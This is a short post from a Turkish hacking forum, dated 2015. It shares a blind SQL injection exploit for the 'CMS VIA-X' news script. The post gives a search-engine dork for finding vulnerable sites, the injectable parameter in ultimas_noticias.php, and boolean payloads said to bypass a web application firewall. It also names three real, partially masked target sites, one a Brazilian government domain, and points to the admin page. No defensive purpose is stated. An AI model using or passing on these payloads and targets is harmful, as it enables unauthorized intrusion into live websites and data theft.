Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: CMS VIA-X SQL Injection
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 124
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
CMS VIA-X SQL Injection
17.01.2015 20:22
[+] Risk: Hig

[+] Tested on: Windows 7 and Linux

[+] Vulnerable File: ultimas_noticias.php

Kod:
[+} Dork : inurl:ultimas_noticias.php?codnoticia=

[+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection]

ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection.

[+] PoC: http://www.caXmaramuritiba.ba.gov.br/ult...noticia=37
http://www.vanXdelson.com.br/ultimas_not...noticia=53
http://www.faXt.edu.br/ultimas_noticias....oticia=797

[+] Admin Page: http://host/admin/
Alinti



1 Ziyaretçi